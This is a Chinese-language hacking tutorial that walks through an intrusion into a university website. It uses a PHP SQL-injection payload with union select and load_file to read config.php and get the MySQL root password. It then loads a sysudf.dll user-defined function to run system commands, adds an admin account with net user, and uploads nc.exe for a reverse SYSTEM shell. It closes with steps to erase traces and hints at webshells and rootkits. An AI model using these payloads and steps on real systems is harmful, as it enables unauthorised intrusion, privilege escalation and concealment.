PHP注入 MYSQL=SYSTEM权限

研究了mysql提权的问题后，我们不难想到，如果没有若口令怎么办呢？暴力破解？太需要运气了！其实结合php注入是很容易搞定的~下面我就用php注入来演示一下，和我一样菜的朋友们注意啦，开始实践啦！

找到一个站，它的软件下载部分存在php注入漏洞。随便再一个有漏洞的地方加了一个引号，报错了，如图一：

 

得到了网站路径了~，但是我们的目标是得到mysql的密码，而这个密码啦，一般是在config.php里面的。所以我们只需要爆出config.php的内容就好说了！php注入爆文件的内容当然是采用load_file()，可是，load_file需要知道完整的路径，难道我们去猜？当然不，我们先来爆图1报错得到文件名，因为一般这些文件都有这种语句：require(“包含的php文件的路径”)，而这个一般都会有包括config.php的。好，看我来做：

要用load_file()当然得用union了，猜字段这种事情很枯燥的，我们可以利用一些辅助工具（当然如果你有casi4.0这种极品工具就更好了，但是穷人用不起啊！）。我介绍一个我用的工具PHPSend.exe,猜字段数目的好工具！使用也很简单！利用他，我得到了字段数目，如图2：

 

19个字段，其中第12个字段对应图1

中的简介位置，好，我们开始报global.php的路径，先把绝对路径转化为16进制形式，同时考虑到是爆php文件的内容，为了避免php执行后，无法全部显示所有文件内容，我们把<?php……?>中的“?”替换为“@”，就可以全部显示了！如何替换？我们用这个：replace(load_file(0x绝对路径16进制值),0x3F,0x40) 

注：0x3F对应“?”,0x40对应“@”。我们提交：

http://xxx.xxx.edu.cn/study/show.php?id=244%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,replace(load_file(0x443A5C……绝对路径),0x3F,0x40),13,14,15,16,17,18,19

好，我们爆出了文件内容，他确实也包含了config.php文件，如图3.：

 

看到了config.php的路径了把~。好，我们继续爆它的内容，如图4：

 

看到了吧~，我们得到了mysql的密码！

用mysql里面的工具，mysql.exe来连接对方:

E:\mysql>mysql -u root -h 对方的ip –p

好了，下面就简单了，先上传dll文件，这里我们选用sysudf.dll，还是使用那个sysudf.dll.txt的脚本来上传：

Mysql>\. E:\mysql\sysudf.dll.txt

脚本运行完毕后,然后导出为dll文件，如图5:

 

这里需要注意的是，不同的系统的，请注意路径不一样，如果是2003的系统你最好导出到c:\windows这个目录，不然会有爆错的~

再来创建函数,如图6：

 

这里，只要你的dll文件路径和上一部一致即可。但是要注意，由于mysql的转义了一些字符，所有的路径，都必须用“\\”，否则导出讲不成功！

好了，这时如果对方有3389的话，你就可以直接用：select sys_name(‘net user admin admin /add');来添加用户了，可惜我这台机器没有开3389，我们用同样的方法上传并导出nc.exe，然后执行操作，如图7：

 

这时你的本地监听的端口，将得到一个反弹的shell，如图8：

 

好，这个system权限的shell我们已经拿到（如果你有什么命令输入不对，这个sys_name函数是可以反复执行的，不用担心哦，再来一次就可以了！）。可是任务还没有完成哦~别急着闪人先！我们还没有擦掉痕迹啊！我们为了上传sysudf.dll和nc.exe一共建立了两个临时表：temp1,temp3,我们用drop table 表名；来删除表。然后我们还建立sys_name函数，我们用：drop function sys_name;来删除函数！最后，show tables;来看看有没有清理干净，而select * from func;可以察看mysql里面的所有函数。

入侵任务到此完全完成。但是，请大家不要把思维局限于文中的方法！我们想象一下，如果对方开了防火墙之类的东西，我们无法连接它的mysql怎么办？放弃？当然不是，我们可以想办法得到对方的php的webshell（如何得到？去看以前的《黑客X档案》吧！），这里我们需要能够执行sql命令的webshell，比如phpspy2006，然后通过webshell登陆它的mysql，直接创建函数不就可以了？对方总不至于拦截本地的连接请求吧？（不要说这个时候你还要用mysql脚本上传啊！你的webshell难道就没有上传的功能？），在这个webshell下，我们不也是可以用select sys_name(‘命令’)来执行任何系统命令？至于是运行rootkit还是什么的，就各凭所好啦！